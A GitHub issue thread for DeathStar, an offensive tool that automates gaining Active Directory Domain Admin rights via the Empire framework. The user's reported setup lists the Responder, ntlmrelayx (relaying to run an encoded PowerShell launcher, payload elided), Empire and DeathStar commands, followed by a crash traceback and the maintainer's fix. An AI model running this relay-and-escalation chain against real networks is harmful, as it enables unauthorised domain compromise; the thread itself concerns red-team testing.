byt3bl33d3r / DeathStar

Uses Empire's (https://github.com/BC-SECURITY/Empire) RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.
GNU General Public License v3.0

DeathStar Dies on New Agent #14

Closed siesta888 closed 7 years ago

siesta888 commented 7 years ago

I'm trying to set up the following on a test network as per the tutorials on your site: https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html

PLUS

https://byt3bl33d3r.github.io/automating-the-empire-with-the-death-star-getting-domain-admin-with-a-push-of-a-button.html

My setup:

  1. python Responder.py -d -r -f -w -F -P -I eth0
  2. ntlmrelayx -tf targets.txt -c "powershell -noP -sta -w 1 -enc powershell code here"
  3. ./empire --rest --username username --password password
  4. ./Deathstar.py -u username -p password

I can get a new agent by copying in the DeathStar launcher PowerShell command, and DeathStar sees the new agent, but then it dies shortly thereafter. Error message posted below.

[+] New Agent => Name: BDHZE51L IP: 1.2.3.4 HostName: SB-W7-2 UserName: REDACTED HighIntegrity: 1
Exception in thread Thread-2:
Traceback (most recent call last):
  File "/usr/lib/python3.5/threading.py", line 914, in _bootstrap_inner
    self.run()
  File "./DeathStar.py", line 59, in __run
    self.__run_backup()
  File "/usr/lib/python3.5/threading.py", line 862, in run
    self._target(*self._args, **self._kwargs)
  File "./DeathStar.py", line 538, in pwn_the_shit_out_of_everything
    for user in get_loggedon(agent_name):
  File "./DeathStar.py", line 364, in get_loggedon
    results = execute_module_with_results('powershell/situational_awareness/network/powerview/get_loggedon', agent_name, module_options)
  File "./DeathStar.py", line 170, in execute_module_with_results
    if result['taskID'] == r['taskID']:
KeyError: 'taskID'

Any idea what the issue could be? After that error Empire just hangs and doesn't do anything else.

Target is a Windows 7 Enterprise machine.

byt3bl33d3r commented 7 years ago

You don't seem to be using my fork of Empire, as it says in the readme file and the article.

byt3bl33d3r commented 7 years ago

The PR I mentioned has been merged, but the changes haven't been pushed to the master branch. So you can now either use Empire's dev branch or my fork. Cheers

siesta888 commented 7 years ago

Gah! You're right. I should have RTFM more. Thanks much.